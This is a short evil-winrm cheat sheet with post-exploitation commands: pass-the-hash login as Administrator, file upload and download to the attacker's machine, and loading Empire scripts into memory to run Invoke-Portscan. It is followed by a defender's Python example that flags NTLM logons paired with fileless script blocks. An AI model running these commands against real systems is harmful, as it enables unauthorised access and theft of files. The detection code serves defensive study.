# evil-winrm

* Authenticate with a password or an NTLM hash

```sh
evil-winrm -u Administrator -H <Hash> -i <IP>
evil-winrm -u Administrator -p <Password> -i <IP> -P <Port>
```

## Upload & Download

* Inside an open session on the host

```sh
upload <attackerFilePath>
download <remoteFilePath> <attackerFilePath>
```

## Load PowerShell Scripts into Target Memory

* Load attacker scripts into the target's memory

```sh
evil-winrm -u <user> -p <password> -i <IP> -s <localScriptDir>
```
* As an example, load the Empire scripts directory for port scanning

```sh
evil-winrm -u Administrator -H 37db630168e5f82aafa8461e05c6bbd1 -i 127.0.0.1 -P 8001 -s tools/post_exploitation/bc_security/Empire/empire/server/data/module_source/situational_awareness/network/
```

* Initialize `Invoke-Portscan.ps1`
* `Get-Help Invoke-Portscan`

```sh
Invoke-Portscan -Hosts 10.200.187.100 -TopPorts 50
```
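
What the session above leaves on the target, seen from the defender's side, as an added example that is not part of the original notes: an NTLM network logon (Security event 4624, logon type 3) followed by a PowerShell script block (event 4104) with no file path that names `Invoke-Portscan`. It assumes Script Block Logging is enabled; the records are constructed and flattened, and the `host`/`sid`/`time` keys, watch list and time window are illustrative choices.

```python
from datetime import datetime, timedelta

# Constructed, flattened sample records (not real logs). Event-data field names
# follow Security 4624 (logon) and PowerShell/Operational 4104 (script block).
EVENTS = [
    {"id": 4624, "time": "2024-05-01T10:00:02", "host": "SRV01", "sid": "S-1-5-21-1-500",
     "LogonType": 3, "AuthenticationPackageName": "NTLM", "IpAddress": "10.0.0.50"},
    {"id": 4104, "time": "2024-05-01T10:01:10", "host": "SRV01", "sid": "S-1-5-21-1-500",
     "Path": "", "ScriptBlockText": "function Invoke-Portscan { param($Hosts,$TopPorts) }"},
    {"id": 4624, "time": "2024-05-01T11:00:00", "host": "SRV02", "sid": "S-1-5-21-1-1104",
     "LogonType": 3, "AuthenticationPackageName": "Kerberos", "IpAddress": "10.0.0.20"},
    {"id": 4104, "time": "2024-05-01T11:00:30", "host": "SRV02", "sid": "S-1-5-21-1-1104",
     "Path": "C:\\Scripts\\backup.ps1", "ScriptBlockText": "Get-ChildItem D:\\ | Out-Null"},
]

WATCHED = ("invoke-portscan",)   # assumption: extend with names relevant to your estate
WINDOW = timedelta(minutes=10)   # assumption: correlation window


def correlate(events, watched=WATCHED, window=WINDOW):
    """Pair NTLM network logons with later script blocks that have no file path."""
    logons, alerts = [], []
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        if (ev["id"] == 4624 and ev["LogonType"] == 3
                and ev["AuthenticationPackageName"].upper() == "NTLM"):
            logons.append((ts, ev))
        elif ev["id"] == 4104 and not ev["Path"]:
            # Empty Path: the script block did not come from a file on disk.
            text = ev["ScriptBlockText"].lower()
            hits = [w for w in watched if w in text]
            if not hits:
                continue
            for lts, lev in logons:
                same_session = (lev["host"], lev["sid"]) == (ev["host"], ev["sid"])
                if same_session and ts - lts <= window:
                    alerts.append({"host": ev["host"], "sid": ev["sid"],
                                   "source_ip": lev["IpAddress"], "matched": hits,
                                   "logon_time": lev["time"], "script_time": ev["time"]})
                    break
    return alerts


if __name__ == "__main__":
    for alert in correlate(EVENTS):
        print(alert)
```

The Kerberos logon with a script run from a file on `SRV02` is not flagged; only the `SRV01` pair is.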